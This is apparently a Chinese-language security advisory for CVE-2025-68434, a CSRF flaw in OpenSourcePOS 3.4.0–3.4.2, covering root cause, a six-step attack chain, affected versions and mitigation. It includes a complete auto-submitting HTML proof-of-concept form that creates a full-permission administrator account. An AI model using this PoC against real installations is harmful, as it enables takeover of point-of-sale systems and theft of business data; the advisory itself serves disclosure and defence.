CVE-2025-68434 OpenSourcePOS CSRF漏洞导致管理员账户创建

漏洞信息

漏洞编号

CVE-2025-68434

漏洞类型

CSRF跨站请求伪造

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Open Source Point of Sale (opensourcepos)

漏洞概述

Open Source Point of Sale（OSPOS）是一款基于PHP和CodeIgniter框架开发的Web销售点应用程序。该漏洞存在于3.4.0至3.4.2版本中，由于应用在过滤器配置中显式禁用了CSRF保护机制，导致所有状态变更请求（POST请求）可以在不验证CSRF令牌的情况下被处理。攻击者可以构造恶意网页，诱导已登录的管理员访问，从而在管理员不知情的情况下向目标应用发送创建新管理员账户的请求。成功利用此漏洞后，攻击者可以获得系统的完全控制权，导致机密性、完整性和可用性的完全丧失。此漏洞CVSS评分高达8.8，属于高危漏洞。

技术细节

漏洞根源在于OSPOS的CSRF保护机制被显式禁用。在正常情况下，CodeIgniter框架的CSRF保护会要求所有POST请求携带有效的CSRF令牌。然而，在受影响的版本中，`app/Config/Filters.php`配置文件中的CSRF过滤器被禁用，导致应用无法验证请求的合法性。攻击者利用这一缺陷，可以构造包含管理员创建请求的恶意HTML页面。当已登录的管理员访问该页面时，浏览器会自动向目标OSPOS服务器发送POST请求，创建新的管理员账户。由于请求是从管理员的浏览器发出的，服务器会认为是合法的管理员操作。此外，修复版本3.4.2还调整了令牌再生设置以解决相关的AJAX竞态条件问题。

攻击链分析

STEP 1

1

攻击者搭建恶意网页，包含针对OSPOS管理员创建功能的CSRF payload

STEP 2

2

攻击者通过钓鱼邮件、社交工程或恶意链接诱导已登录的OSPOS管理员访问恶意页面

STEP 3

3

管理员浏览器自动向目标OSPOS服务器发送POST请求，由于CSRF保护被禁用，请求被服务器接受

STEP 4

4

服务器在管理员会话中执行请求，创建具有完整权限的新管理员账户

STEP 5

5

攻击者使用新创建的管理员凭据登录系统，获得完全控制权

STEP 6

6

攻击者可以窃取敏感数据、篡改系统配置或部署进一步攻击，实现对系统的完全入侵

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!DOCTYPE html> <html> <head> <title>OSPOS CSRF Exploit</title> </head> <body> <h1>OSPOS CSRF PoC - Unauthorized Admin Creation</h1> <p>Target: http://target-osp installation</p> <form id="exploit" action="http://target-osp/index.php/people/save" method="POST"> <input type="hidden" name="type" value="employee"> <input type="hidden" name="person_id" value=""> <input type="hidden" name="first_name" value="Malicious"> <input type="hidden" name="last_name" value="Admin"> <input type="hidden" name="gender" value=""> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="phone_number" value="1234567890"> <input type="hidden" name="address_1" value=""> <input type="hidden" name="address_2" value=""> <input type="hidden" name="city" value=""> <input type="hidden" name="state" value=""> <input type="hidden" name="zip" value=""> <input type="hidden" name="country" value=""> <input type="hidden" name="comments" value=""> <input type="hidden" name="employee_number" value=""> <input type="hidden" name="hire_date" value=""> <input type="hidden" name="termination_date" value=""> <input type="hidden" name="email_work" value=""> <input type="hidden" name="email_personal" value=""> <input type="hidden" name="username" value="malicious_admin"> <input type="hidden" name="password" value="P@ssw0rd123"> <input type="hidden" name="repeat_password" value="P@ssw0rd123"> <input type="hidden" name="override_default_tax" value="0"> <input type="hidden" name="no_tax" value="0"> <input type="hidden" name="tax_classification" value=""> <input type="hidden" name="info_code" value=""> <input type="hidden" name="deliveries" value="0"> <input type="hidden" name="not_for_sales" value="0"> <input type="hidden" name="is_deleted" value="0"> <input type="hidden" name="language" value="en-US"> <input type="hidden" name="theme" value=""> <input type="hidden" name="timezone" value=""> <input type="hidden" name="currency_value" value="1"> <input type="hidden" name="sales_tax_codes" value="0"> <input type="hidden" name="print_after_sale" value="0"> <input type="hidden" name="default_employee" value="1"> <input type="hidden" name="selected_modules" value='{"employees":1,"customers":1,"suppliers":1,"reports":1,"items":1,"receivings":1,"sales":1,"configurations":1,"giftcards":1,"item_kits":1,"messages":1,"expenses":1}'> <input type="hidden" name="submit" value="submit"> </form> <script> document.getElementById('exploit').submit(); </script> <p>Exploit sent automatically...</p> </body> </html>

影响范围

OpenSourcePOS >= 3.4.0

OpenSourcePOS < 3.4.2

防御指南

临时缓解措施

立即升级到OpenSourcePOS 3.4.2版本。如无法立即升级，可手动在app/Config/Filters.php中重新启用CSRF过滤器（取消注释相关配置），但需注意这可能导致销售模块的功能异常，因为存在令牌同步问题。建议在测试环境中验证后再部署到生产环境。同时，管理员应避免点击不明链接，定期审查系统中的管理员账户列表，及时发现可疑账户。